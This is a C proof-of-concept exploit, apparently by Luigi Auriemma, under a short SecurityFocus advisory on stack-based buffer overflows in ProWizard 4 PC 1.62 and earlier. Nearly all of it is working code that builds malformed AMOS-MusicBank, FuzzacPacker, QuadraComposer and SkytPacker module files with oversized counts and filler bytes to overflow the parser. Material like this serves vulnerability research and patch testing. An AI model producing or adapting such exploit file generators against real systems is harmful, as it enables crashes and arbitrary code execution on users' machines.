// source: https://www.securityfocus.com/bid/26953/info ProWizard 4 PC is prone to multiple stack-based buffer-overflow issues because it fails to perform adequate boundary checks on user-supplied data. Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions. These issues affect ProWizard 4 PC 1.62 and prior versions; other versions may also be vulnerable. /* by Luigi Auriemma */ #include #include #include #define VER "0.1" #define BUFFSZ 0xffff #define BOFCHR 0x58585858 #define u8 unsigned char int putxx(u8 *data, unsigned num, int bits); void std_err(void); int main(int argc, char *argv[]) { FILE *fd; int i, j, attack, samp_off, inst_off, songs_off, bofnum; u8 *fname, *buff, *p, *file_size; setbuf(stdout, NULL); fputs("\n" "Pro-Wizard <= 1.62 multiple buffer-overflow "VER"\n" "by Luigi Auriemma\n" "e-mail: aluigi@autistici.org\n" "web: aluigi.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s \n" "\n" "Attack:\n" " 1 = AMOS-MusicBank\n" " 2 = FuzzacPacker\n" " 3 = QuadraComposer\n" " 4 = SkytPacker (unexploitable due to only one byte in a 32 bit array)\n" "\n", argv[0]); exit(1); } attack = atoi(argv[1]); fname = argv[2]; buff = malloc(BUFFSZ); if(!buff) std_err(); memset(buff, 0, BUFFSZ); p = buff; songs_off = 256; // some values samp_off = 256; inst_off = 1024; bofnum = 255; file_size = NULL; if(attack == 1) { printf("- AMOS-MusicBank\n"); p += putxx(p, 'A', 8); p += putxx(p, 'm', 8); p += putxx(p, 'B', 8); p += putxx(p, 'k', 8); p += putxx(p, 0x00, 8); p += putxx(p, 0x03, 8); p += putxx(p, 0x00, 8); p += putxx(p, 0x01, 8); file_size = p; // BANK_LEN p += 4; p += putxx(p, 'M', 8); p += putxx(p, 'u', 8); p += putxx(p, 's', 8); p += putxx(p, 'i', 8); p += putxx(p, 'c', 8); p += putxx(p, ' ', 8); p += putxx(p, ' ', 8); p += putxx(p, ' ', 8); p += putxx(p, inst_off, 32); // INST_HDATA_ADDY p += putxx(p, songs_off, 32); // SONGS_DATA_ADDY p += putxx(p, 0, 32); // PAT_DATA_ADDY p = buff + (songs_off + 0x14); p += putxx(p, 1, 16); p += putxx(p, 0, 32); p = buff + (inst_off + 0x14); p += putxx(p, bofnum, 16); // samples for(i = 0; i < bofnum; i++) { putxx(p, BOFCHR, 32); p += 32; } putxx(file_size, (p - buff) - 12, 32); } else if(attack == 2) { printf("- FuzzacPacker\n"); p += putxx(p, 'M', 8); p += putxx(p, '1', 8); p += putxx(p, '.', 8); p += putxx(p, '0', 8); p += 2 + (68 * 31); p += putxx(p, bofnum, 8); // PatPos p += putxx(p, 0, 8); // NbrTracks p = buff + 2118; for(i = 0; i < (4 * bofnum * 4); i++) { p += putxx(p, bofnum, 8); } p += putxx(p, BOFCHR, 32); } else if(attack == 3) { printf("- QuadraComposer\n"); bofnum = 32; // max 32 p += putxx(p, 'F', 8); p += putxx(p, 'O', 8); p += putxx(p, 'R', 8); p += putxx(p, 'M', 8); file_size = p; p += 4; p += putxx(p, 'E', 8); p += putxx(p, 'M', 8); p += putxx(p, 'O', 8); p += putxx(p, 'D', 8); p += putxx(p, 'E', 8); p += putxx(p, 'M', 8); p += putxx(p, 'I', 8); p += putxx(p, 'C', 8); p = buff + 22 + 41; p += putxx(p, bofnum, 8); for(i = 0; i < bofnum; i++) { p[0] = i + 0x70; putxx(p + 2, BOFCHR / 2, 16); putxx(p + 30, BOFCHR, 32); p += 34; } p += 1000; putxx(file_size, (p - buff) - 8, 32); } else if(attack == 4) { printf("- SkytPacker\n"); p += 256; p += putxx(p, 'S', 8); p += putxx(p, 'K', 8); p += putxx(p, 'Y', 8); p += putxx(p, 'T', 8); p = buff + 260; p += putxx(p, bofnum - 1, 8); for(i = 0; i < bofnum; i++) { for(j = 0; j < 4; j++) { p += putxx(p, BOFCHR, 8); p += putxx(p, BOFCHR, 8); } } p += 22529; } else { printf("\nError: wrong attack number (%d)\n", attack); exit(1); } printf("- create file %s\n", fname); fd = fopen(fname, "wb"); if(!fd) std_err(); fwrite(buff, 1, p - buff, fd); fclose(fd); free(buff); printf("- done\n"); return(0); } int putxx(u8 *data, unsigned num, int bits) { int i, bytes; bytes = bits >> 3; for(i = 0; i < bytes; i++) { data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff; } return(bytes); } void std_err(void) { perror("\nError"); exit(1); }